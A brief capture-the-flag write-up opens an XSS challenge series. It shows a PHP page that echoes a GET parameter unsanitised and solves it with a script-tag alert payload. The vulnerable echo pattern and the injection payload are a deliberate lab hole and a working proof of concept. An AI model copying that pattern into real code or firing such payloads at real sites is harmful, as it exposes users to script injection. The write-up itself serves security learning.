Writeups from challenges and CTFs i take part in.
Welcome to this XSS-related writeup series. We’ll walk through some interesting XSS payloads and methods. This challenge requires us to execute alert('XSS') or alert(document.domain)
In this first challenge, the webpage’s backend source is visible:
<script src="hook.js"></script>
<?php
echo $_GET["payload"];
?>
<h1>inject</h1>
<form>
<input type="text" name="payload" placeholder="your payload here">
<input type="submit" value="GO">
</form>
<h1>src</h1>
<?php highlight_string(file_get_contents(basename(__FILE__))); ?>
This code tells us enough to solve the challenge:
<?php
echo $_GET["payload"];
?>
the web server will return anything we put inside the text without any sanitization. That means we can submit this payload:
<script>alert(document.domain)</script>
and pass the challenge